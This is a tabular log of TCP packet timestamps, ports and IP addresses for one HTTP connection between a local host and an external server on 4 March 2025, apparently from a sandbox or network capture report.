Mar 4, 2025 09:35:22.939424992 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939443111 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.939476013 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.939603090 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939656019 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939662933 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.939675093 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939713955 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939730883 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.939785004 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939799070 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939834118 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.939874887 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939891100 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939945936 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.939979076 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939990997 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940002918 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940026999 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.940046072 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.940094948 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940135956 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940315962 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940329075 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940345049 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940372944 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.940401077 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.940407991 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940419912 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940433025 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940445900 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.940453053 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940479040 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.940584898 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940598011 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940638065 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.940804958 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940823078 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940839052 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940855980 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.940881968 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.940908909 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940921068 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.940984964 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.941138983 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941184044 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941195965 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941241980 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941248894 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.941286087 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.941303015 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941315889 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941344976 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941374063 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.941435099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941447020 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941484928 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.941508055 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941519022 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941582918 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.941631079 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941670895 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941679001 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.941689968 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941736937 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.941761017 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941772938 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.941812992 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.069808006 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.069827080 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.069854021 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.069874048 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.069885015 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.069905043 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.069916964 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.069931984 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.069941998 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.069952011 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.069993019 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.070211887 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070234060 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070247889 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070285082 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.070293903 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070332050 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.070352077 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070363045 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070405960 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.070419073 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070436954 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070449114 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070486069 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.070523024 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070534945 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070570946 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.070600033 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070642948 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.070662022 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070672989 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070718050 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.070756912 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070771933 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070818901 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.070832968 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070867062 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070880890 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070924044 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.070955038 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.070966005 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071038961 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.071182966 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071193933 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071213961 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071224928 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.071232080 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071244001 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.071252108 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071304083 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.071322918 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071342945 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071355104 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071382999 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.071657896 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071696997 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071711063 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071747065 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.071754932 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071763039 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.071772099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071902037 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071912050 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071918964 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.071928978 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071940899 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.071978092 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.071988106 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.072000027 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.072027922 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.072036982 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.072068930 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.072079897 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.072118998 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.072144032 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.072197914 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.072210073 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.072242975 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.072257996 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.072298050 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.074989080 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.129075050 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.158075094 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.158087015 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.158176899 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.200333118 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.200356007 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.200370073 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.200408936 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.200417995 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.200444937 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.200453043 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.200464010 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.200530052 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.200603008 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.200613022 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.200653076 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.201123953 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201169014 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201181889 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201215982 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.201340914 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201353073 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201364040 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201376915 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201389074 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.201421022 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.201466084 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201477051 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201514006 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.201591969 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201605082 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201659918 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201672077 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201689005 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.201697111 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201705933 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.201783895 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.201807022 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201818943 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201829910 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201843977 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201855898 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.201867104 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.201894045 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.202020884 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202034950 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202074051 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.202095032 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202117920 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202132940 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.202161074 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202172041 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202189922 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202198982 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.202231884 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.202454090 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202476025 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202488899 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202516079 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.202626944 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202666998 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.202724934 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202771902 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202784061 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202817917 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.202888012 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202899933 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202939987 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.202955008 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.202966928 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.203001976 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.203128099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.203141928 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.203154087 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.203167915 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.203181982 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.203192949 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.203201056 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.203213930 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.203223944 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.203233004 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.203250885 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.331130981 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331154108 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331166983 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331178904 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331192970 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331262112 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.331274033 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331288099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331295967 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331305027 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.331356049 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.331697941 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331743956 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331757069 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331793070 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.331808090 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331836939 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331850052 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.331903934 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331914902 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.331948042 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332056046 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332068920 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332079887 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332103014 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332108974 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332118988 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332127094 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332151890 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332178116 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332206011 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332217932 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332254887 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332346916 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332357883 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332401991 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332412004 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332422972 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332433939 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332454920 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332472086 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332568884 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332581043 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332654953 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332673073 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332683086 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332690954 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332701921 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332714081 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.332722902 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332741022 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.332998037 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333018064 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333028078 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333062887 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.333090067 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.333101988 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333432913 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333444118 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333456993 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333492994 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.333519936 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333528042 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.333539963 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333573103 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.333584070 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333645105 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333697081 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333709955 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333739996 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.333755970 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333762884 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.333838940 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333851099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333888054 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.333921909 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333931923 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.333960056 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.379102945 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.462002993 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462028027 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462039948 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462093115 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.462119102 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462130070 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462136030 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462142944 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462254047 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.462560892 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462609053 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462615013 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.462625980 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462729931 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462740898 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462754011 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.462764025 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462784052 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.462831020 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462887049 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462898970 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.462934017 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.462975025 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.463021040 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463032007 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463041067 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463048935 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463093042 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:23.463150978 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:23.463171005 CET	80	49709	45.144.214.104	192.168.2.6
